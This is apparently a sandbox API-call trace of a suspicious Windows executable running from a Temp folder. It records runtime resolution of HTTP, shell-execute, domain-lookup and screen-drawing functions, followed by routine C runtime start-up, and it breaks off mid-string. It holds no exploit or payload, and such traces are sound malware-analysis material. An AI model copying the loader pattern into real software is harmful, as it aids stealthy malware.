[0078.654] VirtualProtect (in: lpAddress=0x47829c, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.654] GetProcAddress (hModule=0x75cf0000, lpProcName="ShellExecuteW") returned 0x75d03c71 [0078.654] GetProcAddress (hModule=0x75cf0000, lpProcName="SHGetFolderPathW") returned 0x75d75708 [0078.654] VirtualProtect (in: lpAddress=0x47829c, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.654] GetModuleHandleA (lpModuleName="WININET.dll") returned 0x0 [0078.654] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75ba0000 [0078.691] VirtualProtect (in: lpAddress=0x4782c8, dwSize=0x3c, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetCrackUrlA") returned 0x75bad075 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetCloseHandle") returned 0x75bbab49 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetSetOptionA") returned 0x75bb75e8 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetQueryOptionA") returned 0x75bb1b56 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetOpenA") returned 0x75bcf18e [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetConnectA") returned 0x75bc49e9 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpOpenRequestA") returned 0x75bc4c7d [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpSendRequestA") returned 0x75c318f8 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpSendRequestExA") returned 0x75c31812 [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpEndRequestA") returned 0x75bd45ea [0078.691] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpQueryInfoA") returned 0x75bba33e [0078.692] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetReadFile") returned 0x75bbb406 [0078.692] GetProcAddress (hModule=0x75ba0000, lpProcName="InternetWriteFile") returned 0x75bd46da [0078.692] GetProcAddress (hModule=0x75ba0000, lpProcName="HttpAddRequestHeadersA") returned 0x75bbdcd2 [0078.692] VirtualProtect (in: lpAddress=0x4782c8, dwSize=0x3c, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.692] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x76b20000 [0078.692] VirtualProtect (in: lpAddress=0x478080, dwSize=0x34, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="SetBkMode") returned 0x76b351a2 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="GetDeviceCaps") returned 0x76b34de0 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="SetTextColor") returned 0x76b3522d [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="GetDIBits") returned 0x76b36001 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="SelectObject") returned 0x76b34f70 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="CreateCompatibleDC") returned 0x76b354f4 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="DeleteDC") returned 0x76b358b3 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="CreateFontA") returned 0x76b3d0e8 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="CreateSolidBrush") returned 0x76b34f17 [0078.692] GetProcAddress (hModule=0x76b20000, lpProcName="GetObjectA") returned 0x76b385d4 [0078.693] GetProcAddress (hModule=0x76b20000, lpProcName="DeleteObject") returned 0x76b35689 [0078.693] GetProcAddress (hModule=0x76b20000, lpProcName="CreateCompatibleBitmap") returned 0x76b35f49 [0078.693] VirtualProtect (in: lpAddress=0x478080, dwSize=0x34, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.693] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x76e10000 [0078.693] VirtualProtect (in: lpAddress=0x4782a8, dwSize=0x20, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="GetDC") returned 0x76e272c4 [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="ReleaseDC") returned 0x76e27446 [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="DrawTextW") returned 0x76e325cf [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="FillRect") returned 0x76e30eb6 [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemMetrics") returned 0x76e27d2f [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="SystemParametersInfoW") returned 0x76e290d3 [0078.693] GetProcAddress (hModule=0x76e10000, lpProcName="FrameRect") returned 0x76e3899d [0078.693] VirtualProtect (in: lpAddress=0x4782a8, dwSize=0x20, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.693] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x74f70000 [0078.693] VirtualProtect (in: lpAddress=0x478304, dwSize=0x14, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.693] GetProcAddress (hModule=0x74f70000, lpProcName="CoUninitialize") returned 0x74fb86d3 [0078.694] GetProcAddress (hModule=0x74f70000, lpProcName="CoCreateInstance") returned 0x74fb9d0b [0078.694] GetProcAddress (hModule=0x74f70000, lpProcName="CoInitializeSecurity") returned 0x74f97259 [0078.694] GetProcAddress (hModule=0x74f70000, lpProcName="CoInitializeEx") returned 0x74fb09ad [0078.694] VirtualProtect (in: lpAddress=0x478304, dwSize=0x14, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.694] GetModuleHandleA (lpModuleName="NETAPI32.dll") returned 0x0 [0078.694] LoadLibraryA (lpLibFileName="NETAPI32.dll") returned 0x74a70000 [0078.785] VirtualProtect (in: lpAddress=0x478274, dwSize=0xc, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.786] GetProcAddress (hModule=0x74a70000, lpProcName="DsRoleGetPrimaryDomainInformation") returned 0x74a31f3d [0078.805] GetProcAddress (hModule=0x74a70000, lpProcName="DsRoleFreeMemory") returned 0x74a319a9 [0078.805] VirtualProtect (in: lpAddress=0x478274, dwSize=0xc, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.805] GetModuleHandleA (lpModuleName="urlmon.dll") returned 0x753b0000 [0078.805] VirtualProtect (in: lpAddress=0x478318, dwSize=0x8, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.805] GetProcAddress (hModule=0x753b0000, lpProcName="ObtainUserAgentString") returned 0x753e1d76 [0078.805] VirtualProtect (in: lpAddress=0x478318, dwSize=0x8, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.805] GetModuleHandleA (lpModuleName="OLEAUT32.dll") returned 0x75520000 [0078.805] VirtualProtect (in: lpAddress=0x478280, dwSize=0x1c, flNewProtect=0x4, lpflOldProtect=0x18ff14 | out: lpflOldProtect=0x18ff14*=0x2) returned 1 [0078.805] GetProcAddress (hModule=0x75520000, lpProcName=0x8) returned 0x75523ed5 [0078.805] GetProcAddress (hModule=0x75520000, lpProcName=0x6) returned 0x75523e59 [0078.805] GetProcAddress (hModule=0x75520000, lpProcName=0x95) returned 0x755246a5 [0078.805] GetProcAddress (hModule=0x75520000, lpProcName=0x9) returned 0x75523eae [0078.806] GetProcAddress (hModule=0x75520000, lpProcName=0x2) returned 0x75524642 [0078.806] GetProcAddress (hModule=0x75520000, lpProcName=0x96) returned 0x75524731 [0078.806] VirtualProtect (in: lpAddress=0x478280, dwSize=0x1c, flNewProtect=0x2, lpflOldProtect=0x18ff1c | out: lpflOldProtect=0x18ff1c*=0x4) returned 1 [0078.806] VirtualFree (lpAddress=0x310000, dwSize=0x81600, dwFreeType=0x4000) returned 1 [0078.807] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0078.807] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff7c | out: lpSystemTimeAsFileTime=0x18ff7c*(dwLowDateTime=0x530053d0, dwHighDateTime=0x1d31760)) [0078.807] GetCurrentProcessId () returned 0xb68 [0078.807] GetCurrentThreadId () returned 0xb6c [0078.807] GetTickCount () returned 0x1b894 [0078.807] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff74 | out: lpPerformanceCount=0x18ff74*=449219599) returned 1 [0078.807] GetStartupInfoW (in: lpStartupInfo=0x18ff20 | out: lpStartupInfo=0x18ff20*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x18ff84, hStdError=0x40677d)) [0078.807] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0078.809] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x751d0000 [0078.809] GetProcAddress (hModule=0x751d0000, lpProcName="FlsAlloc") returned 0x751e4f2b [0078.809] GetProcAddress (hModule=0x751d0000, lpProcName="FlsGetValue") returned 0x751e1252 [0078.809] GetProcAddress (hModule=0x751d0000, lpProcName="FlsSetValue") returned 0x751e4208 [0078.809] GetProcAddress (hModule=0x751d0000, lpProcName="FlsFree") returned 0x751e359f [0078.810] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x751d0000 [0078.810] GetCurrentThreadId () returned 0xb6c [0078.810] GetStartupInfoW (in: lpStartupInfo=0x18febc | out: lpStartupInfo=0x18febc*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x403b99, hStdOutput=0x403ed2, hStdError=0x5707d0)) [0078.810] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0078.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0078.810] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0078.810] SetHandleCount (uNumber=0x20) returned 0x20 [0078.810] GetCommandLineA () returned="\"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\agraba8.exe\" " [0078.810] GetEnvironmentStringsW () returned 0x5f1d90* [0078.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1478, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1478 [0078.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1478, lpMultiByteStr=0x5711f8, cbMultiByte=1478, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1478 [0078.810] FreeEnvironmentStringsW (penv=0x5f1d90) returned 1 [0078.810] GetLastError () returned 0x7e [0078.810] SetLastError (dwErrCode=0x7e) [0078.810] GetLastError () returned 0x7e [0078.810] SetLastError (dwErrCode=0x7e) [0078.810] GetLastError () returned 0x7e [0078.810] SetLastError (dwErrCode=0x7e) [0078.810] GetACP () returned 0x4e4 [0078.810] GetLastError () returned 0x7e [0078.810] SetLastError (dwErrCode=0x7e) [0078.810] IsValidCodePage (CodePage=0x4e4) returned 1 [0078.810] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0078.810] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0078.810] GetLastError () returned 0x7e [0078.810] SetLastError (dwErrCode=0x7e) [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0078.811] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0078.811] GetLastError () returned 0x7e [0078.811] SetLastError (dwErrCode=0x7e) [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā") returned 256 [0078.811] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0078.811] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0078.811] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÇW\x19I\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0078.811] GetLastError () returned 0x7e [0078.811] SetLastError (dwErrCode=0x7e) [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0078.811] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā") returned 256 [0078.811] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0078.811] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿঅ剝煍@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0078.811] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f 